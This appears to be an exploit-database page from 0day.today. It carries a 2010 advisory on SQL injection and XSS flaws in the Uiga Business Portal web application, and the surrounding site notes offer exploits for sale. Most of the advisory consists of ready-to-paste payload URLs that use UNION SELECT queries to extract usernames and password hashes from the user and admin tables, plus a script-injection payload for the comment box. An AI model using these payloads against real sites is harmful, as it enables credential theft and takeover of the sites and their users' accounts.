0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Uiga Business Portal SQL/ XSS Vulnerability
=========================================== Uiga Business Portal SQL/ XSS Vulnerability =========================================== # Exploit Title: Uiga Business Portal SQL/ XSS Vulnerability # Date: 8/2/2010 # Author: Sioma Labs # Site : http://www.scriptdevelopers.net # Software Link: http://www.scriptdevelopers.net/download/uigapersonalportal.zip # Version: N/A # Tested on: Linux OS = Cent OS 5.4 Server = Apache/2.2.3 SQLDB = MYSQL v5.0.77 Windows OS = Windows XPsp2 App = Wamp # CVE : N/A # Code : N/A ---------------------------------------------------- __ _ __ _ / _(_) ___ _ __ ___ __ _ / / __ _| |__ ___ \ \| |/ _ \| '_ ` _ \ / _` | / / / _` | '_ \/ __| _\ \ | (_) | | | | | | (_| | / /___ (_| | |_) \__ \ \__/_|\___/|_| |_| |_|\__,_| \____/\__,_|_.__/|___/ ---------------------------------------------------- SQL Injection Vulnerability UserAge : [host]/blog/index.php?view=noentryid&noentryid=[SQLi] - User SQLi -> -------------- Ex : http://server/ulgabusinessportak/blog/index.php?view=noentryid&noentryid=-20+Union+All+Select+1,2,3,4,5,group_concat(user_id,0x3a,username,0x3a,password),7,8,9,10+from+tbl_user-- - Admin SQLi -> --------------- Ex : http://server/ulgabusinessportak/index2.php?c=29&p=-45+Union+All+Select 1,group_concat(admin_id,0x3a,admin_name,0x3a,admin_password),3,4,5+from+admin-- - Or Choice By User ID -> -------------------------- http://server/ulgabusinessportak/blog/index.php?view=noentryid&noentryid=-20+Union+All+select+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10+from+tbl_user+where+user_id=1-- */ Change the last User ID ####################################################################################################### XSS Vulnerability -------- - You can inject html with the comment box Test Link http://server/ulgabusinessportak/blog/index.php?view=noentryid&noentryid=20 Inject "<script>alert("XSS")</script>" into the portal using Comment Box # 0day.today [2024-12-24] #